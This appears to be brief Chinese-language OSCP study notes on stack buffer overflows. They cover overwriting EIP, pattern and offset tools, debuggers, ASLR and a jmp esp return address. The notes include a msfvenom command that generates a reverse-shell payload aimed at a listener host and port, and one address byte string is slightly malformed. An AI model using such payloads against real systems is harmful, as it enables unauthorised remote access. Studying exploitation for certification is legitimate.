缓存区溢出

缓存区溢出

oscp只考stack溢出

GDB调试

Explain输入500个A后,程序出现溢出,如果将EIP寄存器中存在的AAAA替换成Payload就可以实现执行任意的命令

Explain处输入构造字符,可以确认

debugger图形化工具调试

  • 地址空间配置随机加载:是指地址空间配置随机加载(英语:Address space layout randomization,缩写ASLR,又称地址空间配置随机化、地址空间布局随机化)是一种防范内存损坏漏洞被利用的计算机安全技术。

  • edb-debugger:动态调试工具

  • msf-pattern_create:字符序列生成工具

  • msf-pattern_offset:字符偏移计算

  • msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.2 LPORT=5555 -b "\x00" -f py

如果程序本身具有jmp esp指令,只需将0x08049d55内存地址写入攻击脚本**BBBB**位置处

具体代码如下'\x55\x9d\x04\08'

关于数据值与内存地址

EIP: 0x45444342 ('BCDE') B对应的是42:EIP: 0x45444342 ('BCDE') C对应的是43:EIP: 0x45444342 ('BCDE') D对应的是44:EIP: 0x45444342 ('BCDE') E对应的是45:EIP: 0x45444342 ('BCDE')

最后更新于

这有帮助吗?